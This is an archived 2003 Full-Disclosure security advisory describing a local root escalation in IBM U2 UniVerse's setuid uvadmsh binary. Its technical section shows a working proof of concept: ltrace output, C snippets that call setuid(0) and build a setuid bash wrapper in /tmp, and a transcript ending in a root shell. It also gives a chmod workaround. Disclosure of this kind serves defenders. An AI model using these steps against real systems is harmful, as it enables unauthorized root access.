[Full-Disclosure] SRT2003-07-07-0833 - IBM U2 UniVerse users with uvadm rights can take root via uvadmsh

From: KF (dotslashat_private)
Date: Tue Jul 15 2003 - 17:43:39 PDT

Next message: KF: "[Full-Disclosure] SRT2003-07-07-0831 - IBM U2 UniVerse cci_dir creates hard links as root"

Previous message: KF: "[Full-Disclosure] SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Thanks to IBM for being so receptive with these issues.

For those of you that have requested we revive the old "Snosoft" 
advisories we have begun placing our legacy advisories at 
http://www.secnetops.biz as time permits.
-KF


Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               researchat_private
Team Lead Contact                                 kfat_private


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-07-0833
Product                 : IBM U2 UniVerse
Version                 : Version <= 10.0.0.9 ?
Vendor                  : http://ibm.com/software/data/u2/universe/
Class                   : local
Criticality             : High (to UniVerse servers with local users) 
Operating System(s)     : Only confirmed on Linux (other unix based?)


High Level Explanation
************************************************************************
High Level Description  : users with uvadm rights can take root
What to do              : chmod -s /usr/ibm/uv/bin/uvadmsh


Technical Details
************************************************************************
Proof Of Concept Status : SNO Does have PoC code for this issue. 
Low Level Description   : 

UniVerse is an extended relational database designed for embedding in 
vertical applications. Its nested relational data model results in 
intuitive data modeling and fewer resulting tables. UniVerse provides 
data access, storage and management capabilities across Microsoft®
Windows® NT, Linux and UNIplatform.

The creation and use of the Unix  user 'uvadm' is optional for UniVerse. 
It is not required for the successfull installation, configuration and
administration of UniVerse. The intended use of uvadm is to allow a
selected, specific non-root user to perform all aspects of UniVerse
administration.

The uvadmsh program checks the users name against the string "uvadm"
which means in order to exploit this issue you need to have access to
the user uvadm. 

[kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp
...
strcmp("kf", "uvadm")                                        = -1

[uvadm@vegeta uvadm]$ id
uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)

You will note that with the proper uid the binary begins looking for 
the command line option "-uv.install" which is the path to a binary
file to execute.

[uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp
...
strcmp("uvadm", "uvadm")                                     = 0
strcmp("-uv.install", "-uv.install")                         = 0

This condition is fairly easy to take advantage of as you can see here. 

[uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c
main()
{
setuid(0);
system("cc -o /tmp/owned /tmp/owned.c");
system("chmod 4755 /tmp/owned");
}

[uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c
[uvadm@vegeta uvadm]$ cat > /tmp/owned.c
main()
{
setuid(0);
system("/bin/bash");
}

[uvadm@vegeta uvadm]$ ls -al /tmp/owned
ls: /tmp/owned: No such file or directory

[uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp
[uvadm@vegeta uvadm]$ ls -al /tmp/owned
-rwsr-xr-x    1 root     uvadm       11640 Jul  2 20:15 /tmp/owned

[uvadm@vegeta uvadm]$ /tmp/owned
[root@vegeta uvadm]# id
uid=0(root) gid=503(uvadm) groups=503(uvadm)

Patch or Workaround     : chmod -s /usr/ibm/uv/bin/uvadmsh

Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user
to perform all of the uvadmsh functions.

Vendor Status           : The IBM U2 staff will have this issue resolved 
in a future release of IBM U2. Patches may also be supplied on a per 
client basis at IBM's disgression. 

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact researchat_private for information on how
to obtain exploit information.




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: KF: "[Full-Disclosure] SRT2003-07-07-0831 - IBM U2 UniVerse cci_dir creates hard links as root"
Previous message: KF: "[Full-Disclosure] SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 15 2003 - 18:52:23 PDT